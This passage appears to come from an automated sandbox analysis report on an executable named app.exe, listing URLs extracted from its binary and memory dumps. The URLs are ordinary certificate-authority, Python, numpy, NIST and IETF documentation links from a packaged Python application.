    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
    Source: app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284509974.000002083ABA0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284480705.000002083AB60000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278542188.00000208332B0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284539258.000002083ABE0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3283351198.000002083A09C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284450216.000002083AB10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
    Source: app.exe, 00000002.00000002.3284244401.000002083A8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://digitalassets.lib.berkeley.edu/sdtr/ucb/text/34.pdf
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
    Source: app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
    Source: app.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/BinomialDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/CauchyDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/GammaDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/HypergeometricDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/LaplaceDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/LogisticDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/NegativeBinomialDistribution.html
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/NoncentralF-Distribution.html
    Source: app.exe, 00000000.00000003.2068528399.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://mathworld.wolfram.com/PoissonDistribution.html
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mathworld.wolfram.com/SincFunction.html
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278275253.0000020833100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: http://packages.python.org/altgraph
    Source: app.exe, 00000000.00000003.2068294593.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.00000208335A0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291567385.00007FF8B8CB7000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: http://pracrand.sourceforge.net/RNG_engines.txt
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: http://pypi.python.org/pypi/altgraph
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: http://pypi.python.org/pypi/sphinx
    Source: python38.dll.0.drString found in binary or memory: http://python.org/dev/peps/pep-0263/
    Source: app.exeString found in binary or memory: http://schemas.mic
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timelessrepo.com/json-isnt-a-javascript-subset).
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279032842.0000020833520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234
    Source: app.exe, 00000002.00000002.3284661842.000002083AD20000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284539258.000002083ABE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
    Source: app.exe, 00000002.00000002.3283019914.0000020839F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/jsonschema.svg
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
    Source: app.exe, 00000002.00000002.3278380634.00000208331A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipython.org
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://metacpan.org/pod/distribution/Math-Cephes/lib/Math/Cephes.pod#i0:-Modified-Bessel-function-o
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://numpy.org
    Source: app.exe, 00000002.00000003.2092269988.0000020832F47000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3282681309.0000020839CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3282611585.0000020839C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://numpy.org/doc/stable/reference/random/index.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://numpy.org/neps/nep-0013-ufunc-overrides.html
    Source: app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/ISC)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://optimized-einsum.readthedocs.io/en/stable/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://people.eecs.berkeley.edu/~wkahan/ieee754status/IEEE754.PDF
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_379.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_67.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_69.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_79.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_83.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_86.htm
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pip.pypa.io/en/stable/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/jsonschema/
    Source: app.exe, 00000002.00000002.3282781695.0000020839DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/numpy-financial
    Source: app.exe, 00000002.00000002.3282781695.0000020839DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/numpy-financial$0
